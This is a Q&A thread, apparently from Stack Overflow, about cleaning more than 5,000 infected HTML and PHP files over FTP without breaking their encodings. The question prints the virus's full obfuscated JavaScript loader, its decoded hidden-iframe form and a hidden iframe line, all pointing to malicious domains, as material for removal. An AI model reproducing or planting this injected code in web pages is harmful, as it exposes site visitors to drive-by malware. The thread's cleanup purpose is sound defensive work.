6

I need to download from FTP over 5000 files being .html and .php files. I need to read each file and remove some stuff that was put there by virus and save it back to FTP.

I'm using following code:

string content;
using (StreamReader sr = new StreamReader(fileName, System.Text.Encoding.UTF8, true)) {
    content = sr.ReadToEnd();
    sr.Close();
}

using (StreamWriter sw = new StreamWriter(fileName + "1" + file.Extension, false, System.Text.Encoding.UTF8))
{
    sw.WriteLine(content);
    sw.Close();
}

I downloaded some files by hand and some have <meta http-equiv="Content-Type" content="text/html; charset=windows-1250" /> but I wouldn't want to assume all of them are like that. I checked with Notepad++ and some text files are ANSI. PHP seems to be UTF-8 and HTML Windows-1250 but I would prefer to be sure to not break the files while trying to fix it. So is there a way that I wouldn't have to know/guess the encoding and it would let me remove virus links from web pages?

Edit. I'm trying to find and remove something like this:

var s=new String();try{document.rvwrew.vewr}catch(q){r=1;c=String;}if(r&&document.createTextNode)u=2;e=eval;m=[4.5*u,18/u,52.5*u,204/u,16*u,80/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,206/u,50.5*u,232/u,34.5*u,216/u,50.5*u,218/u,50.5*u,220/u,58*u,230/u,33*u,242/u,42*u,194/u,51.5*u,156/u,48.5*u,218/u,50.5*u,80/u,19.5*u,196/u,55.5*u,200/u,60.5*u,78/u,20.5*u,182/u,24*u,186/u,20.5*u,246/u,4.5*u,18/u,4.5*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,228/u,20*u,82/u,29.5*u,18/u,4.5*u,250/u,16*u,202/u,54*u,230/u,50.5*u,64/u,61.5*u,18/u,4.5*u,18/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,238/u,57*u,210/u,58*u,202/u,20*u,68/u,30*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,64/u,57.5*u,228/u,49.5*u,122/u,19.5*u,208/u,58*u,232/u,56*u,116/u,23.5*u,94/u,51*u,210/u,49*u,202/u,57*u,194/u,57.5*u,232/u,48.5*u,232/u,23*u,198/u,55.5*u,218/u,23.5*u,232/u,50.5*u,218/u,56*u,94/u,57.5*u,232/u,48.5*u,232/u,23*u,224/u,52*u,224/u,19.5*u,64/u,59.5*u,210/u,50*u,232/u,52*u,122/u,19.5*u,98/u,24*u,78/u,16*u,208/u,50.5*u,210/u,51.5*u,208/u,58*u,122/u,19.5*u,98/u,24*u,78/u,16*u,230/u,58*u,242/u,54*u,202/u,30.5*u,78/u, 59*u,210/u,57.5*u,210/u,49*u,210/u,54*u,210/u,58*u,242/u,29*u,208/u,52.5*u,200/u,50*u,202/u,55*u,118/u,56*u,222/u,57.5*u,210/u,58*u,210/u,55.5*u,220/u,29*u,194/u,49*u,230/u,55.5*u,216/u,58.5*u,232/u,50.5*u,118/u,54*u,202/u,51*u,232/u,29*u,96/u,29.5*u,232/u,55.5*u,224/u,29*u,96/u,29.5*u,78/u,31*u,120/u,23.5*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,124/u,17*u,82/u,29.5*u,18/u,4.5*u,250/u,4.5*u,18/u,51*u,234/u,55*u,198/u,58*u,210/u,55.5*u,220/u,16*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,228/u,20*u,82/u,61.5*u,18/u,4.5*u,18/u,59*u,194/u,57*u,64/u,51*u,64/u,30.5*u,64/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,198/u,57*u,202/u,48.5*u,232/u,50.5*u,138/u,54*u,202/u,54.5*u,202/u,55*u,232/u,20*u,78/u,52.5*u,204/u,57*u,194/u,54.5*u,202/u,19.5*u,82/u,29.5*u,204/u,23*u,230/u,50.5*u,232/u,32.5*u,232/u,58*u,228/u,52.5*u,196/u,58.5*u,232/u,50.5*u,80/u,19.5*u,230/u,57*u,198/u,19.5*u,88/u,19.5*u,208/u,58*u,232/u,56*u,116/u,23.5*u,94/u,51*u,210/u,49*u,202/u,57*u,194/u,57.5*u,232/u,48.5*u,232/u,23*u,198/u,55.5*u,218/u,23.5*u,232/u,50.5*u,218/u,56*u,94/u,57.5*u,232/u,48.5*u,232/u,23*u,224/u,52*u,224/u,19.5*u,82/u,29.5*u,204/u, 23*u,230/u,58*u,242/u,54*u,202/u,23*u,236/u,52.5*u,230/u,52.5*u,196/u,52.5*u,216/u,52.5*u,232/u,60.5*u,122/u,19.5*u,208/u,52.5*u,200/u,50*u,202/u,55*u,78/u,29.5*u,204/u,23*u,230/u,58*u,242/u,54*u,202/u,23*u,224/u,55.5*u,230/u,52.5*u,232/u,52.5*u,222/u,55*u,122/u,19.5*u,194/u,49*u,230/u,55.5*u,216/u,58.5*u,232/u,50.5*u,78/u,29.5*u,204/u,23*u,230/u,58*u,242/u,54*u,202/u,23*u,216/u,50.5*u,204/u,58*u,122/u,19.5*u,96/u,19.5*u,118/u,51*u,92/u,57.5*u,232/u,60.5*u,216/u,50.5*u,92/u,58*u,222/u,56*u,122/u,19.5*u,96/u,19.5*u,118/u,51*u,92/u,57.5*u,202/u,58*u,130/u,58*u,232/u,57*u,210/u,49*u,234/u,58*u,202/u,20*u,78/u,59.5*u,210/u,50*u,232/u,52*u,78/u,22*u,78/u,24.5*u,96/u,19.5*u,82/u,29.5*u,204/u,23*u,230/u,50.5*u,232/u,32.5*u,232/u,58*u,228/u,52.5*u,196/u,58.5*u,232/u,50.5*u,80/u,19.5*u,208/u,50.5*u,210/u,51.5*u,208/u,58*u,78/u,22*u,78/u,24.5*u,96/u,19.5*u,82/u,29.5*u,18/u,4.5*u,18/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,206/u,50.5*u,232/u,34.5*u,216/u,50.5*u,218/u,50.5*u,220/u,58*u,230/u,33*u,242/u,42*u,194/u,51.5*u,156/u,48.5*u,218/u,50.5*u,80/u,19.5*u,196/u,55.5*u,200/u,60.5*u,78/u,20.5*u,182/u,24*u,186/u,23*u,194/u,56*u,224/u,50.5*u,220/u,50*u,134/u,52*u,210/u,54*u,200/u,20*u,204/u,20.5*u,118/u,4.5*u,18/u,62.5*u];if(document.createTextNode)with(c)mm=fromCharCode;for(i=0;i!=m.length;i++)s+=mm(e("m"+"["+"i"+']'));try{doc.qwe.removeChild()}catch(q){e(s);}

which after decoding is

if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("");
}
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://fiberastat.com/temp/stat.php');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}

And when you visit webpage it tells you this (after decoding).

if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("");
}
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://vtempe.in/in.cgi?17');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}

The script is added at last 3 lines and basically starts right after </html>var

The PHP script has more or less this type of line <iframe src="http://hugetopdiet.cn:8080/ts/in.cgi?pepsi13" width=2 height=4 style="visibility: hidden"></iframe> but it can be anywhere in the file.

Not sure if there's any other way then to rewrite those files. But having to go thru 5000 files seems a bit too much and risky :-)

MadBoy
  • 10,824
  • 24
  • 95
  • 156
  • If you're modifying the files, you're going to have to know the encoding or you're practically guaranteed to break someting. – Dave Feb 09 '12 at 21:54
  • Just a thought, but don't you have clean versions of these files from before the virus got at them, either the originals that were uploaded or a back-up? If not, that's something to think about going forward. – Matthew Strawbridge Feb 09 '12 at 22:18
  • No. New customer contacted me today and basically all he's got is a bunch of files with 2 types of entries. I've updated question with the `problematic code`. – MadBoy Feb 09 '12 at 23:13
  • Also he has only 3-4 days of backup (hosting has) and he said he noticed this 2months ago.. so backups ain't going to work. – MadBoy Feb 09 '12 at 23:19
  • http://meta.stackexchange.com/questions/121860 – Robert Harvey Feb 09 '12 at 23:26
  • @Robert I can remove it from question if it's a problem. – MadBoy Feb 09 '12 at 23:33
  • 1
    I think the consensus is that it's the antivirus' fault, not yours. – Robert Harvey Feb 09 '12 at 23:35

2 Answers2

3

Assuming that none of the files are UTF16 or UTF32, and that the parts that you want to interact with are entirely 7-bit ASCII, you can open and save it as Encoding.Default, which will round-trip any higher character correctly.

SLaks
  • 868,454
  • 176
  • 1,908
  • 1,964
1

The virus didn't need to know the file encoding in order to add its content to your files so it is obviously possible. Rather than treating the file as text, couldn't you just process it as a binary file and search for patterns that match what the virus added?

M.Babcock
  • 18,753
  • 6
  • 54
  • 84